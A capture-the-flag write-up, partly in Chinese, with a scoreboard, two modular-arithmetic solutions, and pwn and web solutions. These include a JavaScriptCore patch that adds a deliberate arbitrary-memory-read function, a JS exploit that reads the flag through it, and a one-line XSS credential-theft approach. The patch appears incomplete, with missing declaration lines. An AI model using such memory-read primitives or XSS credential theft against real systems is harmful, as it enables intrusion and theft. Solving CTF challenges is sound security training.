# Jack’s 2023 New Year CTF WriteUp

1 bml 456 84.56 Y
2 xtex 415 39.15 Y
3 QY 396 38.96 Y
4 Yuzhen 366 19.66 Y
5 FlyingSky 366 18.66 Y
6 undefined 296 8.96 Y
7 morty 296 7.96
8 predit 215 7.15
9 ricky8955555 166 6.66 Y
10 Sakii 67 5.67

# Math

## Euler

p = 2^{82589933}-1p是素数。

a = 1046773254920148904775273163043a是素数。

p为素数时，\phi (p) = p-1

a^{p+1} \equiv a^{p-1+2} \equiv a^{\phi(p)+2} \equiv a^{2} (\bmod p)

## Order

3^{(2^{82589933}-2) \times 464808334276175608222914454469 + 10}
(\bmod (2^{82589933}-1) \times 929616668552351216445828908939))

p_1 = 2^{82589933}-1, p_2 = 929616668552351216445828908939。它们都是素数。

3^{(p_1 – 1) \times \frac{p_2 – 1}{2} + 10} (\bmod p_1 p_2)

m, n都是大于1的整数，且(a,m) = 1, (m,n) = 1时，ord_{mn}(a) = [ord_{m}(a), ord_{n}(a)]

3^{(p_1 – 1) \times \frac{p_2 – 1}{2}} \equiv 3^{ord_{p_1}(3) \times k ord_{p_2}(3)} \equiv 3^{k \times ord_{p_1 p_2}(3)} \equiv (3^{ord_{p_1 p_2}(3)})^{k} \equiv 1 (\bmod p_1 p_2)

# Pwn

## jsc_builtin

read("flag")


## jsc_ar

jsc_ar.patch:

diff --git a/Source/JavaScriptCore/jsc.cpp b/Source/JavaScriptCore/jsc.cpp
index 897f095f6335..422e366c63ea 100644
--- a/Source/JavaScriptCore/jsc.cpp
+++ b/Source/JavaScriptCore/jsc.cpp
@@ -83,6 +83,9 @@
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
#include <type_traits>
#include <wtf/CPUTime.h>
#include <wtf/FileSystem.h>
@@ -294,6 +297,7 @@ static JSC_DECLARE_HOST_FUNCTION(functionMemoryUsageStatistics);
static JSC_DECLARE_HOST_FUNCTION(functionCreateMemoryFootprint);
static JSC_DECLARE_HOST_FUNCTION(functionResetMemoryPeak);
static JSC_DECLARE_HOST_FUNCTION(functionVersion);
static JSC_DECLARE_HOST_FUNCTION(functionRun);
static JSC_DECLARE_HOST_FUNCTION(functionRunString);
@@ -542,18 +546,19 @@ private:
@@ -701,6 +706,10 @@ private:
this->putDirectCustomAccessor(vm, identifier, custom, PropertyAttribute::DontEnum | PropertyAttribute::DontDelete | PropertyAttribute::CustomValue);
}
}
+
+        int fd = open("flag", O_RDONLY);
+        mmap((void *) 0x100000000000, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0);
+        close(fd);
}

public:
@@ -1512,6 +1521,16 @@ JSC_DEFINE_HOST_FUNCTION(functionAddressOf, (JSGlobalObject*, CallFrame* callFra
return returnValue;
}

+{
+    if (callFrame->argumentCount() == 1) {
+        JSValue target = callFrame->uncheckedArgument(0);
+        return JSValue::encode(JSBigInt::createFrom(globalObject, *(uint64_t *)JSBigInt::toBigUInt64(target.asHeapBigInt())));
+    }
+    return JSValue::encode(jsUndefined());
+}
+
+
JSC_DEFINE_HOST_FUNCTION(functionVersion, (JSGlobalObject*, CallFrame*))
{
// We need this function for compatibility with the Mozilla JS tests but for now



Exp:

let hexFlag = "";
for (let i = 0n; i < 0x1000n; i += 0x8n) {
let hexFlippedStr = arbitraryRead(0x100000000000n + i).toString(16);
let hexStr = "";
for (let j = hexFlippedStr.length - 2; j >= 0 ; j -= 2) {
hexStr += hexFlippedStr.slice(j, j + 2);
}
hexFlag += hexStr;
}
let flag = "";
for (let i = 0; i < hexFlag.length; i += 2) {
flag += String.fromCharCode("0x" + hexFlag.slice(i, i+2));
}
print(flag);


# Web

## OneLine

XSS拿管理员的用户名和口令登入查看flag。

# 参考资料

[1] https://renjikai.com/jacks-2022-new-year-ctf-writeup/
[2] http://hi.pcmoe.net/roar.html
[3] https://github.com/WebKit/WebKit/blob/main/Source/JavaScriptCore/jsc.cpp#L566